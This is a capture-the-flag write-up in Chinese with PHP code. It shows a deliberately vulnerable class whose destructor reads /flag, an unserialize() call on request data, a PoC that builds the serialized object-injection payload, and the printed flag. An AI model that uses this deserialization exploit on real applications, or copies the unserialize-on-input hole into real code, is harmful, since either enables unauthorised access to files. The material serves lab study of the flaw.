源码

<?php

class Taurus
{
    // Deliberately untyped: unserialize() can inject a value of any type into
    // these properties, and typed declarations would alter that behaviour.
    public $user;
    public $pass;
    public $email;

    /**
     * @param mixed $user  compared against a fixed account name in register()
     * @param mixed $pass  compared against a fixed password in register()
     * @param mixed $email compared against a fixed address in register()
     */
    public function __construct($user, $pass, $email)
    {
        $this->user = $user;
        $this->pass = $pass;
        $this->email = $email;
    }

    /**
     * Runs when the object is released. It forwards to register(), so every
     * instance — including one produced by unserialize() of request data, as in
     * the handler at the bottom of this file — reaches register() without any
     * caller invoking it. A privileged action behind a magic method is the
     * gadget the page's payload relies on.
     */
    public function __destruct()
    {
        echo __METHOD__, "\n";
        $this->register();
    }

    /**
     * Prints its own name and, only when all three properties strictly equal the
     * hard-coded credentials, echoes the contents of /flag. Since the properties
     * are attacker-controlled for a deserialized object, the comparison is not
     * an authorisation check in practice.
     */
    public function register()
    {
        echo __METHOD__, "\n";

        $isExpectedAccount = $this->user === "lutalica"
            && $this->pass === "P@ssw0rd"
            && $this->email === '231452327@ti.me';

        if (!$isExpectedAccount) {
            return;
        }

        echo file_get_contents('/flag');
    }
}

// NOTE(review): unserialize() on request data lets the client pick the class and
// property values of the object that gets created, and the Taurus destructor
// above then runs on that object. A format that does not instantiate objects
// (json_decode), or unserialize() with the allowed_classes option, is the
// defensive alternative.
$serialized = $_REQUEST['Taurus'] ?? null;
if ($serialized !== null) {
    unserialize($serialized);
} else {
    echo "系统检测发现该处漏洞,进行攻击测试\n";
}

POC

<?php

class Taurus
{
    // Mirrors the property layout of the target class so that serialize()
    // produces the same O:6:"Taurus":3:{...} structure; this copy carries no
    // __destruct() or register(), it only exists to build the string.
    public $user;
    public $pass;
    public $email;

    public function __construct($user, $pass, $email)
    {
        [$this->user, $this->pass, $this->email] = [$user, $pass, $email];
    }
}

// Serialize an instance with the values register() expects and print the result.
$payload = serialize(new Taurus("lutalica", "P@ssw0rd", "231452327@ti.me"));
echo $payload;
O:6:"Taurus":3:{s:4:"user";s:8:"lutalica";s:4:"pass";s:8:"P@ssw0rd";s:5:"email";s:15:"231452327@ti.me";}

传入 payload,得到:

Taurus::__destruct
Taurus::register
Sonder{135d79-ba631f65200a5f-870225232871-7af1e740}

payload 被反序列化,触发 Taurus 类的 __destruct 方法,进而执行 register() 方法,最终执行 file_get_contents('/flag'),得到文件 /flag 的内容。